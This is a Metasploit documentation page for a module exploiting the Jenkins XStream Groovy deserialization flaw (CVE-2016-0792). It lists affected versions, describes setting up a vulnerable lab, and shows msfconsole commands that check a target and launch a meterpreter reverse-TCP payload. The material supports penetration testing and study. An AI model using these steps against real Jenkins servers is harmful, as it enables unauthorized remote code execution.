dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity
metasploit-framework/documentation/modules/exploit/multi/http/jenkins_xstream_deserialize.md

2.2 KiB
Raw Permalink Blame History

Jenkins XStream Groovy classpath Deserialization Vulnerability (CVE-2016-0792)

This module exploits a vulnerability in Jenkins versions older than 1.650 and Jenkins LTS versions older than 1.642.2 which is caused by unsafe deserialization in XStream with Groovy in the classpath, which allows remote arbitrary code execution. The issue affects default installations. Authentication is not required to exploit the vulnerability.

Vulnerable Application

Jenkins versions < 1.650 and Jenkins LTS versions < 1.642.2

Download Jenkins (Windows) < version 1.650 from here: http://mirrors.jenkins-ci.org/windows/

Windows Installation: Double click .msi

Download Jenkins LTS (Debian) < version 1.642.2 from here: https://pkg.jenkins.io/debian-stable/

Download Jenkins (Debian) < version 1.650 from here: https://pkg.jenkins.io/debian/

Debian Installation: sudo dpkg --install jenkins_1.642.1_all.deb

Options

TARGETURI

The base path to Jenkins application / by default

VHOST

The HTTP server virtual host. You may need to configure this as well, even though it is set as optional.

The Check Command

The jenkins_xstream_deserialize module comes with a check command that can attempt to check if the remote host is vulnerable or not. To use this, configure the msfconsole similar to the following:

Note: The check only uses appears to be vulnerable because it is not possible to differentiate from HTTP headers which Jenkins line (Weekly or LTS) is running.

set RHOST [IP]

set TARGETURI [path to Jenkins]

msf exploit(jenkins_xstream_deserialize) > check

[*] 192.168.1.64:8080 The target appears to be vulnerable..

Exploiting the Host

After identifying the vulnerability on the target machine, you can try to exploit it. Be sure to set TARGETURI to the correct URI for your application, and the TARGET variable for the appropriate host OS.

msf exploit(jenkins_xstream_deserialize) > set RHOST 192.168.1.37
RHOST => 192.168.1.37
msf exploit(jenkins_xstream_deserialize) > set target 3
target => 3
msf exploit(jenkins_xstream_deserialize) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(jenkins_xstream_deserialize) > exploit